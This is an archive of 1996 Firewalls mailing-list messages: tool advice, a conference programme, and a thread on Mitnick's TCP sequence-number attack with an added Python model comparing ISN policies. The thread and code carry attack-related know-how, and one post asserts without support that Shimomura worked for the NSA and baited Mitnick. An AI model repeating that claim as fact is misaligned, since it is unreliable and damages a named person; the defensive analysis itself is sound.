> > > - how to calculate network topology, eg. IP-numbers and netmasks
> > > - how to calculate the costs for the equipment (firewalls, routers ...)
> > > - how to ...
> > >

I use Visio Pro to draw network topologies. It has a fair library of
icons, and can import a wide variety of file types if you want to create
your own from scratch or clip art. This is an M$-Wind0ws compatible
product, but it sounds like that's what you're running. I use M$-Excel
for calculating costs.
If you want a customized solution, there are third-party database links
to Autocad that would allow you to generate costs from a database linked
to a drawing. This would be a much more expensive solution, in terms of
software costs, workstation requirements, learning curve, configuration,
etc., and wouldn't pay off unless you are doing nothing but
costing/managing networks all day long.

There is a facilities management package called AfMan that is an AutoCad
add-on - it was designed to update facilities databases from changes
made to an AutoCad drawing, do job costs, etc., but could easily be
used/adapted to network costing / management. Contact Gene Wachowski at
KDP, 301-419-0085 if interested.

I'd recommend sticking with Visio, however. You can learn the basics
and be up and running in half an hour, but it supports CAD-like
functions, such as basic snaps, etc. Once this came out, I stopped using
everything else. Shapeware Corporation, 1-800-446-3335 or 303-743-9533.

>
> > You might want to think about a CAD package, like
> > Intergraph Microstation or IsiCad. The Microstation
>
> Don't know what they cost, but I believe that Microstation is MORE
> expensive than AutoCAD, which runs in the neighborhood of $5000. That's
> a little high for what the original poster wants to do, I think.
> Besides, he is obviously running Windows (mention of Powerpoint), and
> Microstation is UNIX isn't it? (not sure). I know that Freelance Graphic
> blows for this kind of stuff. Perhaps something like Corel Draw may be
> better? The latest version is 6.0, and I think you can get 5.0 and 4 for
> less than $100 or so now. This and a decent clipart package (or look,
> there is a usenet group for clip-art, I think) would be all that you
> really need for network diagrams. Then you could import these into Excel
> or 1-2-3 or something if you need to have cost projections and network
> diagrams on one page.
>
> As for IP addresses, etc. I think you are on your own there.
>
> Brain21
>

From firewalls-owner Wed Jan 10 14:26:23 1996
From: JOSE LUIS VERDEGUER NAVARRO
To: David Kovar
Cc: Bill Husler, Firewalls@GreatCircle.COM
Date: Wed, 10 Jan 1996 09:20:38 +0100 (MET)
Subject: Re: Security managing Cisco Routers

From firewalls-owner Wed Jan 10 15:27:32 1996
From: Andrew Cameron
To: firewalls@greatcircle.com
Date: Wed, 10 Jan 1996 22:11:15 +0200 (GMT+0200)
Subject: Internet Policy/Security Policy

I would like to know where I can find examples of an Internet/Security
Policy for a company. I will need to write one in the near future and
would like to draw on the experience of others.
Thanks in anticipation

-----------------------------------------------------------------------------
Andrew Cameron
Internet : andrew@andy.alt.za
X.400 : C=ZA G=Andrew S=Cameron Admd=TELKOM400
----------------------------------------------------------------------------

From firewalls-owner Wed Jan 10 15:31:40 1996
From: smb@research.att.com
To: Firewalls@GreatCircle.COM
cc: Brain21
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting)
Date: Wed, 10 Jan 96 16:59:25 EST

> I would like to know this... if Shimomura is so good (and I actually
> believe that he may be) then why did he leave the r-utils enabled? Why
> did he not use TCPWrappers to prevent spoofing? Why did he allow people
> to see inside his network (Mitnick saw that there was a machine
> "X-something" that he believed was trusted by Shimomura's machine)? I
> mean, I believe that Shimomura knew of the possibility of this type of
> attack WAY ahead of time (like months or years). Why no encryption to
> stop this type of attack? Why did he not use random sequence numbers?

TCP wrappers don't defend against sequence number guessing attacks.
The essence of the attack is that the bad guy is using an IP address that you trust -- and it doesn't matter if it's checked by rshd or the TCP wrapper; if it's fraudulent, it's fraudulent. It's harder than you might think to hide the existence of trusted machines, unless you're using an application or circuit firewall.

Random sequence numbers break other things about TCP; see Appendix A to RFC 1185. For that matter, see my 1989 paper -- it's the best-known early description of the attack (and yes, Tsutomu did know of my paper; we discussed various generalizations of it in 1991 and 1992).

Encryption, or cryptographic authentication a la Kerberos, would have done the trick. But a lot of people, including me, had doubts about whether or not the attack was practical across a WAN. Obviously, we were wrong, and the reason we were wrong is that we didn't remember the exact gagging attack that Morris described in his 1985 tech report in which he reported the invention of this attack.

A couple of months ago, I did come up with a strong but simple defense against sequence number attacks.
For details, see ftp://ds.internic.net/internet-drafts/draft-rfced-info-bellovin-00.txt

--Steve Bellovin

From firewalls-owner Wed Jan 10 15:38:11 1996
Date: Wed, 10 Jan 1996 09:20:35 +0100 (MET)
From: JOSE LUIS VERDEGUER NAVARRO
To: Rob Deker
Cc: firewalls@greatcircle.com
Subject: Re: question

From firewalls-owner Wed Jan 10 15:41:54 1996
Date: Wed, 10 Jan 1996 09:20:57 +0100 (MET)
From: JOSE LUIS VERDEGUER NAVARRO
To: Mike Culver
Cc: firewalls@greatcircle.com
Subject: Re: Holes in SunOS sendmail -Reading Root Mail
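As an added model of the two points Steve Bellovin makes in his message above (this is an illustration written for this page, not his code, the draft's text, or any stack's implementation), the Python below contrasts a host-global ISN counter with the per-connection keyed offset his draft proposes, taken here in the form later published as RFC 1948, and with the fully random ISN Brain21 asks about. The addresses, step constants and key are constructed.

```python
import hashlib
import hmac
import random
import secrets

# Constructed model of three initial-sequence-number (ISN) policies. The two
# step constants are modelling assumptions: RFC 793's 4-microsecond clock
# advances the ISN space by 250,000 per second, and BSD-derived stacks of the
# time added a further per-connection bump (taken here as 64,000).
CLOCK_STEP = 250_000
CONNECT_STEP = 64_000
MODULUS = 1 << 32


def clock(start, now):
    """M(t): the monotonic 32-bit counter that every policy below shares."""
    return (start + CLOCK_STEP * now) % MODULUS


class GlobalCounter:
    """One counter for the whole host: every peer draws from one space."""

    def __init__(self, start):
        self.start = start
        self.opened = 0

    def isn(self, local, remote, now):
        # local/remote are (host, port) pairs; ignoring them is the weakness.
        value = (clock(self.start, now) + CONNECT_STEP * self.opened) % MODULUS
        self.opened += 1
        return value


class PureRandom:
    """The 'just randomise it' policy the thread asks about."""

    def __init__(self, seed=None):
        self.rng = random.Random(seed)

    def isn(self, local, remote, now):
        return self.rng.randrange(MODULUS)


class KeyedOffset:
    """Bellovin's defense: ISN = M(t) + F(local, remote, secret), with F a
    keyed one-way function (HMAC-SHA256 here; the choice of F is ours)."""

    def __init__(self, start, secret=None):
        self.start = start
        self.secret = secret if secret is not None else secrets.token_bytes(16)

    def _offset(self, local, remote):
        msg = f"{local[0]}:{local[1]}|{remote[0]}:{remote[1]}".encode()
        digest = hmac.new(self.secret, msg, hashlib.sha256).digest()
        return int.from_bytes(digest[:4], "big")

    def isn(self, local, remote, now):
        return (clock(self.start, now) + self._offset(local, remote)) % MODULUS


def observer_can_predict(policy, now=10):
    """Defender's check for Bellovin's point that the attack rests on a
    trusted address plus a guessable ISN: an observer who legitimately
    opened one connection from its own address guesses the ISN the server
    hands to a *different* peer in the same second. True means guessable."""
    server = ("192.0.2.10", 513)                    # rlogin-style service
    observed = policy.isn(server, ("198.51.100.7", 40000), now)
    guess = (observed + CONNECT_STEP) % MODULUS     # next slot of a shared space
    actual = policy.isn(server, ("203.0.113.5", 1023), now)
    return guess == actual


def seq_after(b, a):
    """b follows a in 32-bit sequence arithmetic (RFC 793 style)."""
    return 0 < (b - a) % MODULUS < (1 << 31)


def monotonic_fraction(policy, trials=200):
    """Fraction of trials in which a later ISN for the *same* 4-tuple still
    follows the earlier one. This is the property that guards against old
    duplicates (the RFC 1185 Appendix A concern); pure randomness loses about
    half of it, the keyed offset keeps all of it because F is fixed per pair."""
    local, remote = ("192.0.2.10", 513), ("203.0.113.5", 1023)
    ok = 0
    for now in range(trials):
        a = policy.isn(local, remote, now)
        b = policy.isn(local, remote, now + 1)
        ok += seq_after(b, a)
    return ok / trials


if __name__ == "__main__":
    key = b"constructed-example-key"
    for name, make in [("global counter", lambda: GlobalCounter(0)),
                       ("pure random", lambda: PureRandom(seed=7)),
                       ("keyed offset", lambda: KeyedOffset(0, key))]:
        print(f"{name:15s} guessable={observer_can_predict(make())!s:5s} "
              f"monotonic={monotonic_fraction(make()):.2f}")
```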
From firewalls-owner Wed Jan 10 15:45:28 1996
Date: Wed, 10 Jan 1996 09:20:32 +0100 (MET)
From: JOSE LUIS VERDEGUER NAVARRO
To: Sick Puppy
Cc: firewalls@greatcircle.com
Subject: Re: Dawg GOT rootkit for Christmas

From firewalls-owner Wed Jan 10 15:48:33 1996
Date: Wed, 10 Jan 1996 09:19:59 +0100 (MET)
From: JOSE LUIS VERDEGUER NAVARRO
To: "KOHLS, KERSTEN"
Cc: firewalls@greatcircle.com
Subject: Re: FreeBSD as a firewall

From firewalls-owner Wed Jan 10 15:52:09 1996
Date: Wed, 10 Jan 1996 09:20:07 +0100 (MET)
From: JOSE LUIS VERDEGUER NAVARRO
To: Pablo
Cc: firewalls@greatcircle.com
Subject: Re: ipx-bridging & ip-routing

From firewalls-owner Wed Jan 10 15:55:24 1996
Date: Wed, 10 Jan 1996 09:20:12 +0100 (MET)
From: JOSE LUIS VERDEGUER NAVARRO
To: Ray Hooker
Cc: "'Firewall Mailing List'"
Subject: Re: Source Routing and Disabling

From firewalls-owner Wed Jan 10 15:59:29 1996
From: nicholscs@agedwards.com (Nichols,Christopher)
To: firewalls@greatcircle.com
Organization: A.G. Edwards & Sons Inc. St. Louis
Date: Wed, 10 Jan 1996 08:00:29 -0600
Subject: SecureID

I am investigating the use of Security Dynamics ACE Servers and SecurID tokens and have a question concerning packet filtering and the passing of the SDI packets through our net.
Given the design:

A (Cisco)-----External Segment-----B(HP Box)----------C(Cisco)----------D(Internal Net)

A - external router and authentication point
B - HP Box where App for users on external segment resides (routing is off)
C - Screening Filter/Firewall
D - Internal Net where ACE Server would reside

Since the design may exist in multiple sites, we plan to use strong filtering between the HP box (B) and the Internal Net (D). We are also considering a commercial firewall at C.

My understanding is that the SDI authentication process uses dynamically assigned port numbers (udp) > 1024. That would require us to open all ports > 1024 at point C so that SDI could pass from A to D. This is not desirable.

1) With routing off at B, does anyone know of an existing proxy to pass the SDI packets across from A to C? Or has anyone written one?

2) How can we set up an effective firewall at C without having to open all ports > 1024 and still allow the SDI authentication process to pass? One suggestion was to use TACACS.

Any thoughts?
Chris

From firewalls-owner Wed Jan 10 16:02:34 1996
Date: Wed, 10 Jan 1996 12:39:33 PST
From: Scott_Rickard@mc.xerox.com (Rickard,Scott)
To: firewalls@greatcircle.com
Cc: brain21@montag33.residence.gatech.edu, jya@pipeline.com (John Young), frankw@in.net (Frank Willoughby)
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG

Date: Tuesday, January 09, 1996 9:56PM
Brain21 writes:

>I would like to know this... if Shimomura is so good (and I actually
>believe that he may be) then why did he leave the r-utils enabled? Why
>did he not use TCPWrappers to prevent spoofing? Why did he allow people
>to see inside his network (Mitnick saw that there was a machine
>"X-something" that he believed was trusted by Shimomura's machine)?

Snip

>Just wondering why...
The answer is quite clear if you have spook world experience and identify with several key elements quoted in Frank Willoughby's re-post of the Cypherpunks mailing list message regarding extracts from Jonathan Littman's book "The Fugitive Game: Online With Kevin Mitnick." In the extracts, Markoff mentions the issue of a bait machine and the possibility of Shimomura being closely affiliated with the DOD, NSA and other intelligence organizations. Shimomura is completely involved in the intelligence business and he definitely knows how to catch mice for rewards from the world's largest feline, the NSA.

The NSA and other intelligence organizations go to great lengths to gather, analyze, correlate and confirm a tremendous amount of information. The NSA and other intelligence organizations attempt to influence perception by both publicly and privately publishing information or shrewdly allowing some type of "inadvertent mouse trap" access.

In the extracts, Markoff also indicates that people live in "a wilderness-of-mirrors kind of world," with respect to the colossal intelligence and counterintelligence business that historians will eventually call the ninth wonder of the world. Globally, the intelligence and counterintelligence businesses are a multi-trillion dollar industry that thrives on information gathering, analysis and dissemination strategies. In the name of unusual essences of national security, honor, pride, greed or any combination of these components, generous numbers of international organizations exchange information between genuine and spurious alliances to cleverly buy, sell and release anticipated beneficial perception.

As for the bigger question of why, humans will always contemplate, attempt and tolerate the conquering of others as long as they continue to want more.

For a quick look at the tip of the complex intelligence iceberg, check out a copy of Codebusters, The Puzzle Palace, and War and Peace.
Scott Rickard
Senior IT Engineering Consultant
Scott_Rickard@mc.xerox.com

From firewalls-owner Wed Jan 10 16:11:29 1996
From: "David M. Balenson"
To: firewalls@greatcircle.com
Date: Wed, 10 Jan 1996 17:37:59 -0500
Subject: Program Announcement - ISOC 1996 Symp. Netw. & Distr. Sys. Security

------------------------------------------------------------------------------

THE INTERNET SOCIETY 1996 SYMPOSIUM ON NETWORK AND DISTRIBUTED SYSTEM SECURITY (NDSS '96)

22-23 FEBRUARY 1996
SAN DIEGO PRINCESS RESORT, SAN DIEGO, CALIFORNIA

The symposium will bring together people who are building software and/or hardware to provide network and distributed system security services. The symposium is intended for those interested in the more practical aspects of network and distributed system security, focusing on actual system design and implementation, rather than in theory. We hope to foster the exchange of technical information that will encourage and enable the Internet community to apply, deploy and advance the state of the available security technology.
------------------------------------------------------------------------------

                    P R E L I M I N A R Y   P R O G R A M

WEDNESDAY, FEBRUARY 21

6:00 P.M. - 8:00 P.M.  RECEPTION

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

THURSDAY, FEBRUARY 22

7:30 A.M.   CONTINENTAL BREAKFAST

8:30 A.M.   OPENING REMARKS

9:00 A.M.   SESSION 1: ELECTRONIC MAIL SECURITY
            Chair: Stephen T. Kent (BBN Corporation, USA)

            Mixing E-mail with BABEL, Gene Tsudik and Ceki Gulcu (IBM Research
            Division, Zurich Research Laboratory, SWITZERLAND)

            An Integration of PGP and MIME, Kazuhiko Yamamoto (Nara Institute
            of Science and Technology, JAPAN)

10:00 A.M.  BREAK

10:30 A.M.  SESSION 2: DISTRIBUTED OBJECT SYSTEMS
            Chair: Dan Nessett (Sun Microsystems, USA)

            A Security Framework Supporting Domain Based Access Control in
            Distributed Systems, Nicholas Yialelis and Morris Sloman (Imperial
            College, London, UNITED KINGDOM)

            PANEL: Scalability of Security in Distributed Object Systems
            Chair: Dan Nessett (Sun Microsystems, USA)
            Panelists: Dan Nessett (Sun Microsystems, USA), Nicholas Yialelis
            (Imperial College, London, UNITED KINGDOM), and Bret Hartman
            (Odyssey Research Associates, USA)

12:00 NOON  LUNCH

1:30 P.M.   SESSION 3: DISTRIBUTED SYSTEM SECURITY
            Chair: Michael Roe (University of Cambridge, UNITED KINGDOM)

            A Flexible Distributed Authorization Protocol, Jonathan Trostle
            (CyberSAFE, USA) and B. Clifford Neuman (Information Sciences
            Institute, University of Southern California, USA)

            Preserving Integrity in Remote File Location and Retrieval, Trent
            Jaeger (University of Michigan, USA) and Aviel D. Rubin (Bellcore,
            USA)

            C-HTTP - The Development of a Secure, Closed HTTP-Based Network on
            the Internet, Takahiro Kiuchi (University of Tokyo, JAPAN) and
            Shigekoto Kaihara (University of Tokyo Hospital, JAPAN)

3:00 P.M.   BREAK

3:30 P.M.   SESSION 4: PANEL: INTELLECTUAL PROPERTY PROTECTION
            Chair: Peter Neumann (SRI International, USA)
            Panelists: David Bernstein (Electronic Publishing Resources, USA),
            Russ Housley (Spyrus, USA), and Dan Boneh (Princeton University,
            USA)

7:00 P.M.   DINNER BANQUET

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

FRIDAY, FEBRUARY 23

7:30 A.M.   CONTINENTAL BREAKFAST

8:30 A.M.   SESSION 5: NETWORK SECURITY
            Chair: Matt Bishop (University of California at Davis, USA)

            Designing an Academic Firewall: Policy, Practice and Experience
            with SURF, Michael B. Greenwald, Sandeep K. Singhal, Jonathan R.
            Stone, and David R. Cheriton (Stanford University, USA)

            Digital Signature Protection of the OSPF Routing Protocol, Sandra
            Murphy and Madelyn Badger (Trusted Information Systems, USA)

            A Case Study of Secure ATM Switch Booting, Shaw-Cheng Chuang and
            Michael Roe (University of Cambridge, UNITED KINGDOM)

10:00 A.M.  BREAK

10:30 A.M.  SESSION 6: KEY MANAGEMENT
            Chair: Burt Kaliski (RSA Laboratories, USA)

            SKEME: A Versatile Secure Key Exchange Mechanism for Internet, Hugo
            Krawczyk (IBM T.J. Watson Research Center, USA)

            IDUP and SPKM: Developing Public-Key-Based APIs and Mechanisms for
            Communication Security Services, Carlisle Adams (Bell-Northern
            Research, CANADA)

11:30 A.M.  LUNCH

1:00 P.M.   SESSION 7: ENCRYPTION
            Chair: Paul Lambert (Oracle, USA)

            An Empirical Study of Secure MPEG Video Transmissions, Iskender Agi
            and Li Gong (SRI International, USA)

            Parallelized Network Security Protocols, Erich Nahum and David J.
            Yates (University of Massachusetts, USA), Sean O'Malley, Hilarie
            Orman and Richard Schroeppel (University of Arizona, USA)

            A "Bump in the Stack" Encryptor for MS-DOS Systems, David A. Wagner
            (University of California at Berkeley, USA) and Steven M. Bellovin
            (AT&T Bell Laboratories, USA)

2:30 P.M.   BREAK

3:00 P.M.   SESSION 8: PANEL: PUBLIC-KEY INFRASTRUCTURE
            Chair: Warwick Ford (Bell Northern Research, CANADA)
            Panelists: John Wankmueller (MasterCard International, USA), Taher
            ElGamal (Netscape Communications, USA), and Michael Baum (VeriSign,
            USA).

------------------------------------------------------------------------------

GENERAL CHAIR:
    Jim Ellis, CERT Coordination Center

PROGRAM CHAIRS:
    David Balenson, Trusted Information Systems
    B. Clifford Neuman, USC Information Sciences Institute

PROGRAM COMMITTEE:
    Tom Berson, Anagram Laboratories
    Matt Bishop, University of California at Davis
    Doug Engert, Argonne National Laboratory
    Warwick Ford, Bell Northern Research (Canada)
    Burt Kaliski, RSA Laboratories
    Steve Kent, BBN Corporation
    Paul Lambert, Oracle
    John Linn, OpenVision Technologies
    Teresa Lunt, Advanced Research Projects Agency
    Dan Nessett, Sun Microsystems
    Hilarie Orman, University of Arizona
    Michael Roe, Cambridge University (UK)
    Rob Rosenthal, U.S. National Institute of Standards and Technology
    Avi Rubin, Bellcore
    Jeff Schiller, Massachusetts Institute of Technology
    Rob Shirey, BBN Corporation
    Doug Tygar, Carnegie Mellon University
    Roberto Zamparo, Telia Research (Sweden)

LOCAL ARRANGEMENTS CHAIR:
    Thomas Hutton, San Diego Supercomputer Center

PUBLICATIONS CHAIR:
    Steve Welke, Institute for Defense Analyses

REGISTRATIONS CHAIR:
    Donna Leggett, Internet Society

STEERING GROUP
    Internet Research Task Force, Privacy and Security Research Group

------------------------------------------------------------------------------

BEAUTIFUL SAN DIEGO PRINCESS RESORT

Location

The Symposium venue is the San Diego Princess Resort, a tropical paradise on a forty-four acre island in Mission Bay, ten minutes from the international airport. Lush gardens landscaped with hundreds of species of tropical and subtropical plants are always ablaze with color and perfect for themed group events.
Charming pathways wander among sparkling waterfalls, across quaint footbridges and sleepy lagoons filled with water lilies and waterfowl. A white sand beach curves around the island for over a mile, and the award-winning grounds encompass five swimming pools and six lighted tennis courts. Spouses and family members can catch a convenient Harbor Hopper for a quick trip to Sea World. After the Symposium, plan to spend the weekend visiting La Jolla, the world famous San Diego Zoo or Mexico, only 30 minutes by car or Trolley.

Housing Information

We have reserved a special block of sleeping rooms at the San Diego Princess Resort at the following rates:

    Lanai Patio & Garden View Rooms      $ 81*
    Lanai Garden & Lagoon View Rooms     $112
    One Bedroom Suite                    $115

* This represents the Government Rate for San Diego. We have a limited number of rooms available at this rate. If you need a government rate, reserve your room early! You must present a valid government id upon check-in.

Based on room type and space availability, these special group rates are applicable two days prior to and two days after the symposium. Current Room Tax is 10.5%. Check-in availability cannot be committed prior to 4:00 p.m. Check-out time is 12:00 noon. The San Diego Princess Resort will make every effort to accommodate any early arrivals, so make sure you give them your arrival time when you make your reservation.

To make a reservation

Contact the San Diego Princess Resort at 1-800-344-2626 (+1-619-274-4630 if outside the United States). To receive the special group rates, reservations must be made no later than January 20, 1996.

CLIMATE

February weather in San Diego is normally very pleasant. Early morning temperatures average 55 degrees while afternoon temperatures average 67 degrees. Generally, a light jacket or sweater is adequate during February; although, occasionally it rains.

REGISTRATION FEES

                                                 ISOC      Non-
                                                 Member    Member
    Early registration (postmarked by Jan. 19)   $295      $330
    Late registration                            $365      $400

REGISTRATION INCLUDES
    - Attendance
    - Symposium Proceedings
    - Two luncheons
    - Reception
    - Banquet
    - Coffee Breaks

FOR MORE INFORMATION on registration contact Donna Leggett by phone at 703-648-9888 or via e-mail to Ndss96reg@isoc.org.

WEB PAGE - Additional information about the symposium and San Diego, as well as an on-line registration form, are available via the Web at: http://www.isoc.org/conferences/ndss96

------------------------------------------------------------------------------

Internet Society Symposium on Network and Distributed System Security
22-23 February, 1996
San Diego, California, USA

Registration Form
---------------------------------------------------------------------------
Fill out this form and FAX it to NDSS'96 Registration (703) 648-9887, send it via electronic mail to Ndss96reg@isoc.org, or mail it to NDSS96, 12020 Sunrise Valley Drive, Suite 210, Reston, VA, 22091, USA
---------------------------------------------------------------------------

Personal Information

__Mr  __Ms  __Mrs  __Dr  __Prof  __M  __Prof Dr  __Dip Ing  __Ing  __Miss  __Mlle

First Name: __________________________   Middle Name: _______________
Family Name: __________________________   __sr  __jr  __II  __III  __PhD

Please enter your name as you would like it to appear on your conference name tag.
Badge Name: _____________________________

Contact Information

Your title: _____________________________
Your affiliation: _____________________________
Your address: _____________________________
              _____________________________
City: _____________________________
State or Province: _____________________________
Postal Code: _____________
Country: _____________________________
Tel (work) Number: _____________________________
Tel (home) Number: _____________________________
Fax Number: _____________________________
EMail address: _____________________________

Special Needs?
Do you have any special needs (vegetarian meals, wheelchair access, etc.)?
_________________________________________________________________________
_________________________________________________________________________

Appear on the Registrants List?
___ Please check here if you would NOT like your name included in the list of registrants.

Payment Information

All Payments must be in United States Dollars.

Conference Charges

If you are an Internet Society member, you are eligible for a reduced registration fee. Non-member symposium attendees will receive a one year Internet Society membership as part of the non-member registration fees.

Check one:
                                                Before        After
                                                January 19    January 19
                                                ----------    ----------
___ Internet Society Member Conference Fee      US$ 295.00    US$ 365.00
___ Non-Member Conference Fee                   US$ 330.00    US$ 400.00

Method of Payment

1. __ Check
   Make payable to the Internet Society. Checks must be postmarked before February 16, 1996 or you will not be registered.

2. __ Credit Card   __ American Express   __ Mastercard   __ Visa
   Name on Credit Card: __________________________
   Credit Card Number: __________________________
   Expiration Date: __________

3. __ First Virtual
   First Virtual Account Number: _________________________

4. __ Wire Transfer*
   Riggs Bank of Virginia        Bank ABA number: 056001260
   8315 Lee Highway              Account number: Internet Society 148 387 10
   Fairfax VA 22031 USA
   Wire Transfer Confirmation Number: ____________________________
   * Please process wire transfer before sending the registration form.

5. __ U.S. Government Purchase order*
   Please provide the P.O. Number: ___________________________
   * Please fax or mail a copy of your purchase order along with your registration form.

Cancellation Policy
-------------------
Refunds will be issued for cancellations received before February 16, 1996. No refunds will be issued after February 16, 1996.
---------------------------------------------------------------------------

From firewalls-owner Wed Jan 10 16:26:29 1996
Date: Wed, 10 Jan 1996 09:20:51 +0100 (MET)
From: JOSE LUIS VERDEGUER NAVARRO
To: Darren Reed
Cc: Firewalls Mailing List
Subject: Re: Reliability of TCP/IP..

From firewalls-owner Wed Jan 10 17:13:58 1996
Date: Wed, 10 Jan 1996 18:47:28 -0600 (CST)
From: Ron DuFresne
To: Scott_Rickard@mc.xerox.com
cc: firewalls@GreatCircle.COM, brain21@montag33.residence.gatech.edu, John Young, Frank Willoughby
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG

Scott,

In other words you're saying that Mitnick was 'invited' in, bordering on entrapment...

Later,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart

***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.

From firewalls-owner Wed Jan 10 17:41:33 1996
Date: Thu, 11 Jan 96 09:50:43 JST
From: "wang"
To: a01056@eps.ua.es
Cc: Firewalls@GreatCircle.COM
Subject: I cannot read your mail
firewalls-owner@GreatCircle.COM Precedence: bulk JOSE LUIS VERDEGUER NAVARRO, I have received 3 pieces of your mails since yesterday, but they have only the mail header. So I cannot read the contents and I do not know why. I use cc:Mail and I suppose it's due to MIME or something else. In your mail header, > Mime-Version: 1.0 > Content-Type: TEXT/PLAIN; CHARSET=US=ASCII I do not know if the others you send mail to can read the contents Regards, Wang, Qin From firewalls-owner Wed Jan 10 17:43:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA16559 for firewalls-outgoing; Wed, 10 Jan 1996 17:01:26 -0800 (PST) Received: from border.dreamworks.com (dreamworks.com [204.250.57.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA16554 for ; Wed, 10 Jan 1996 17:01:22 -0800 (PST) Received: from border.dreamworks.com (daemon@localhost) by border.dreamworks.com (8.6.12/8.6.12) with ESMTP id QAA21211 for ; Wed, 10 Jan 1996 16:47:33 -0800 Received: from gateway (gateway.dreamworks.com [10.1.1.2]) by border.dreamworks.com (8.6.12/8.6.12) with ESMTP id QAA21206 for ; Wed, 10 Jan 1996 16:47:30 -0800 Received: from juice.dreamworks.com by gateway (SMI-8.6/SMI-SVR4) id RAA19466; Wed, 10 Jan 1996 17:00:01 -0800 Received: by juice.dreamworks.com (940816.SGI.8.6.9/940406.SGI.AUTO) for firewalls@greatcircle.com id RAA01752; Wed, 10 Jan 1996 17:02:45 -0800 From: "Alan C.Horn" Message-Id: <9601101702.ZM1750@juice.dreamworks.com> Date: Wed, 10 Jan 1996 17:02:43 -0800 X-Mailer: Z-Mail (3.2.2 10apr95 MediaMail) To: firewalls@greatcircle.com Subject: Encryption export laws from US.. Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know this is slightly off topic for this list, but I thought maybe somebody would know. Apologies in advance to anyone who didn't want to read this. 
I'm looking for some information on the current US restrictions on
Import/Export of encrypted data, using something like PGP. If anyone has any
pointers towards some sources, it would be tremendously helpful.

Many thanks for your time.

Al

--
"It's fifteen hundred miles to Ankh-Morpork" he said. "We've got three hundred
and sixty three elephants, fifty carts of forage, the monsoon's about to break
and we're wearing ... we're wearing ... sort of things, like glass, only dark...
dark glass things on our eyes..."
                              - Terry Pratchett "Moving Pictures".

Alan Horn - Computer Support and Sysadmin - Dreamworks SKG. (+1 818 733 6000)
    [Personal Email : deorth@mono.org]  [Work Email : ahorn@dreamworks.com]

From firewalls-owner Wed Jan 10 17:54:50 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA11525 for firewalls-outgoing; Wed, 10 Jan 1996 14:52:12 -0800 (PST)
Received: from fastlane.net (fastlane.net [204.251.16.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA11518 for ; Wed, 10 Jan 1996 14:51:43 -0800 (PST)
Received: (from lacoursj@localhost) by fastlane.net (8.6.8/8.6.6) id RAA01540; Wed, 10 Jan 1996 17:45:48 -0600
Date: Wed, 10 Jan 1996 17:45:48 -0600 (CST)
From: "Jeffrey D. LaCoursiere"
To: Brain21
cc: Neil , firewalls@GreatCircle.COM
Subject: Re: Source Routed Packets
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

[excellent quasi-tutorial deleted]

I am fairly certain that Wellfleet allows you to do this, if you consider a
Wellfleet configured with filters a firewall...

j

> What firewalls *WILL* allow you to filter on bit sequences like I
> illustrated above??? When I asked this last time the only answer that I
> got was that V-One will allow you to do this to create your own, more
> specific rules. Is that possible? Does only *ONE* vendor support this?
>
> Thanks,
>
> Brain21
>

From firewalls-owner Wed Jan 10 17:56:20 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA07375 for firewalls-outgoing; Wed, 10 Jan 1996 12:07:40 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA05781 for ; Wed, 10 Jan 1996 11:36:41 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id AAA21693; Wed, 10 Jan 1996 00:26:58 -0800
Received: from saul2.u.washington.edu(140.142.56.21) by mycroft via smap (V1.3mjr) id sma021685; Wed Jan 10 00:26:51 1996
Received: by saul2.u.washington.edu (5.65+UW95.12/UW-NDC Revision: 2.33 ) id AA05695; Wed, 10 Jan 96 00:28:42 -0800
X-Sender: cabralje@saul2.u.washington.edu
Date: Wed, 10 Jan 1996 00:28:42 -0800 (PST)
From: James Cabral
To: Firewalls@GreatCircle.COM
Subject: Re: Firewalls-Digest V5 #6
In-Reply-To: <199601050757.XAA28538@miles.greatcircle.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am interested to hear from anyone who has implemented Network Address
Translation with TIS Gauntlet firewall. In particular, did you encounter any
difficulties with this configuration? Are there any advantages/disadvantages
to Gauntlet in regard to address translation?

Thanks,

Jim Cabral

Jim Cabral                         7712 Corliss Ave N, Seattle, WA 98103
Puget Technology Group Inc., Systems Engineer, Voice/Pager/Fax 206/525-1242
Univ. of Washington, 206/543-1017

From firewalls-owner Wed Jan 10 17:57:52 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA03182 for firewalls-outgoing; Wed, 10 Jan 1996 11:06:58 -0800 (PST)
Received: from pimaia2w.prodigy.com (pimaia2w.prodigy.com [192.207.105.46]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA03177 for ; Wed, 10 Jan 1996 11:06:55 -0800 (PST)
Received: from mailinb1.prodigy.com (tinahost [199.4.137.91]) by pimaia2w.prodigy.com (8.6.10/8.6.9) with SMTP id OAA38878 for ; Wed, 10 Jan 1996 14:05:30 -0500
Date: Wed, 10 Jan 1996 14:05:00 EST
From: HFDK41A@prodigy.com (MR. JOHN K MOLNAR)
